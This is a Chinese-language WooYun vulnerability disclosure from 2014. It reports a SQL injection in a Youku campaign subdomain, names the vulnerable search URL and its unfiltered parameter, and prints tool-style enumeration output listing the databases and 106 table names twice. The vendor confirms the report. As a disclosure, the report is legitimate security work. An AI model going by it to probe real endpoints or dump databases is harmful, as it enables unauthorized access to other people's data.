[公开漏洞]优酷网某业务SQL注射

来源:WooYun 浏览:525次 时间:2014-06-12
做网站找雨过天晴工作室
优酷网某业务SQL注射 相关厂商: 优酷 漏洞作者:卡卡 提交时间:2014-04-21 14:21 公开时间:2014-06-05 14:21 漏洞类型:SQL注射漏洞 危害等级:高 自评Rank:20 漏洞状态: 厂商已经确认 漏洞来源:http://www.wooyun.org Tags标签: 无 漏洞详情 披露状态:

2014-04-21:细节已通知厂商并且等待厂商处理中
2014-04-21:厂商已经确认,细节仅向厂商公开
2014-05-01:细节向核心白帽子及相关领域专家公开
2014-05-11:细节向普通白帽子公开
2014-05-21:细节向实习白帽子公开
2014-06-05:细节向公众公开

简要描述:

连发两弹,都没给个优酷会员~~~第三弹走起

详细说明:

问题出现在这个站



http://tide.youku.com/





注入链接:



http://tide.youku.com/search.php?key=1&t=1





由于对参数key没做过滤,造成sql注射



.png





数据库:



available databases [3]:
[*] 2013_gz
[*] information_schema
[*] test





当前库:2013_gz





表:



Database: 2013_gz
[106 tables]
+------------------------+
| 5gum_blacklist |
| 5gum_code |
| 5gum_code_dh |
| anerle_baby |
| anerle_egg |
| anerle_img |
| anerle_limitIP |
| anerle_work |
| bilang_infos |
| cgbxyk_infos |
| cgbxyk_vcodes |
| christmas_scores |
| ctf_iplog |
| ctf_products |
| ctf_videos |
| ctf_vote |
| ctf_vote2 |
| cy_present |
| cy_room |
| deerway_videos |
| dmg_videos |
| fings_project |
| flyscoot_award |
| flyscoot_award_bak1 |
| flyscoot_award_bak2 |
| flyscoot_award_bak3 |
| flyscoot_award_r |
| flyscoot_list |
| flyscoot_times |
| gz_admin_users |
| gz_module_app |
| gz_modules |
| huawei_mate_media |
| huawei_mate_visitor |
| jeanswest_comment |
| jeanswest_game |
| jeanswest_limitIP |
| jeanswest_play |
| jeanswest_province |
| jeanswest_qmhsy_video |
| jeanswest_score |
| jeanswest_shares |
| jeanswest_videos |
| jws_yc_gb |
| jws_yc_ht |
| jws_yc_hx |
| jws_yc_opus |
| jws_yc_video |
| jws_yc_vote |
| jws_yc_vote_ab |
| jws_yc_vote_m |
| lansur_vquestion |
| meiji_playCnt |
| meiji_user |
| minisite_limitIP |
| minisite_vote |
| module_find_count |
| module_find_q |
| module_lottery_infos |
| module_lottery_users |
| ninjiom_code |
| ninjiom_code_dh |
| ninjiom_code_opus |
| ninjiom_opus |
| ninjiom_record_setvote |
| ninjiom_setvote |
| ninjiom_users |
| ninjiom_vote |
| ninjiom_vote_aaa |
| ninjiom_vote_list |
| ninjiom_vote_record |
| nissan_photos |
| nissan_videos |
| nissan_vote_p |
| nissan_vote_v |
| olaydeeplove_counts |
| olaydeeplove_log |
| piaorou_works |
| pld_answer |
| pld_code |
| project_awards |
| project_config |
| project_operational |
| rwsmovie_userdata |
| sc10086_iplong |
| sc10086_lottery |
| sc10086_videos |
| shining_award_r |
| shining_list |
| shining_play |
| shining_play_no |
| shining_setNum |
| shining_times |
| tide_photos |
| tide_videos |
| tide_videos_test |
| yaris_survey |
| zhouss_count |
| zhouss_shares |
| zj_art |
| zj_article |
| zj_manager |
| zj_sharelog |
| zj_user |
| zj_votelog |
| zj_webconfig |
+------------------------+







只是检测,所以就到此为止



漏洞证明:

.png





数据库:



available databases [3]:
[*] 2013_gz
[*] information_schema
[*] test





当前库:2013_gz





表:



Database: 2013_gz
[106 tables]
+------------------------+
| 5gum_blacklist |
| 5gum_code |
| 5gum_code_dh |
| anerle_baby |
| anerle_egg |
| anerle_img |
| anerle_limitIP |
| anerle_work |
| bilang_infos |
| cgbxyk_infos |
| cgbxyk_vcodes |
| christmas_scores |
| ctf_iplog |
| ctf_products |
| ctf_videos |
| ctf_vote |
| ctf_vote2 |
| cy_present |
| cy_room |
| deerway_videos |
| dmg_videos |
| fings_project |
| flyscoot_award |
| flyscoot_award_bak1 |
| flyscoot_award_bak2 |
| flyscoot_award_bak3 |
| flyscoot_award_r |
| flyscoot_list |
| flyscoot_times |
| gz_admin_users |
| gz_module_app |
| gz_modules |
| huawei_mate_media |
| huawei_mate_visitor |
| jeanswest_comment |
| jeanswest_game |
| jeanswest_limitIP |
| jeanswest_play |
| jeanswest_province |
| jeanswest_qmhsy_video |
| jeanswest_score |
| jeanswest_shares |
| jeanswest_videos |
| jws_yc_gb |
| jws_yc_ht |
| jws_yc_hx |
| jws_yc_opus |
| jws_yc_video |
| jws_yc_vote |
| jws_yc_vote_ab |
| jws_yc_vote_m |
| lansur_vquestion |
| meiji_playCnt |
| meiji_user |
| minisite_limitIP |
| minisite_vote |
| module_find_count |
| module_find_q |
| module_lottery_infos |
| module_lottery_users |
| ninjiom_code |
| ninjiom_code_dh |
| ninjiom_code_opus |
| ninjiom_opus |
| ninjiom_record_setvote |
| ninjiom_setvote |
| ninjiom_users |
| ninjiom_vote |
| ninjiom_vote_aaa |
| ninjiom_vote_list |
| ninjiom_vote_record |
| nissan_photos |
| nissan_videos |
| nissan_vote_p |
| nissan_vote_v |
| olaydeeplove_counts |
| olaydeeplove_log |
| piaorou_works |
| pld_answer |
| pld_code |
| project_awards |
| project_config |
| project_operational |
| rwsmovie_userdata |
| sc10086_iplong |
| sc10086_lottery |
| sc10086_videos |
| shining_award_r |
| shining_list |
| shining_play |
| shining_play_no |
| shining_setNum |
| shining_times |
| tide_photos |
| tide_videos |
| tide_videos_test |
| yaris_survey |
| zhouss_count |
| zhouss_shares |
| zj_art |
| zj_article |
| zj_manager |
| zj_sharelog |
| zj_user |
| zj_votelog |
| zj_webconfig |
+------------------------+

修复方案:

你们懂的~~

版权声明:转载请注明来源 卡卡@乌云 漏洞回应 厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-04-21 14:30

厂商回复:

多谢提醒,马上修复。

最新状态:

暂无